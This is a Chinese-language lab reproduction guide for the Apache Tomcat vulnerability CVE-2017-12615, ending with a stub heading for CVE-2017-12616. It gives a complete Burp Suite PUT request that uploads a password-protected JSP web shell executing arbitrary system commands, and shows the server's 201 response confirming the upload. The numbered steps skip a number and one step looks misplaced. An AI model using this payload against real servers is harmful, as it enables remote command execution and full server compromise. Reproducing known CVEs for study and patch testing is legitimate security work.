一、CVE-2017-12615
参照:http://blog.csdn.net/qq1124794084/article/details/78044756
复现方法:
1、下载tomcat 7.0.21
2、修改conf/web/xml文件添加readonly为false
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
3、启动tomcat
4、打开软件Burp Suite Free Edition v1.7.27
5、在Burp Suite Free软件的Repeater标签栏输入如下内容(备注:IP和端口为tomcat运行的服务器的IP以及端口):
PUT /123.jsp/ HTTP/1.1 Host: 10.20.129.14:8080 User-Agent: JNTASS DNT:1 Connection: close Content-Length: 660
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
6、单击Go
7、在弹出框中输入tomcat运行的服务器的IP以及tomcat的web端口
9、单击Go
10、Response如下:
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Tue, 26 Sep 2017 07:07:31 GMT
Connection: close
11、查看tomcat安装目录的webapps/ROOT目录下能够看见123.jsp文件
二、CVE-2017-12616
server.xml文件VirtualDirContext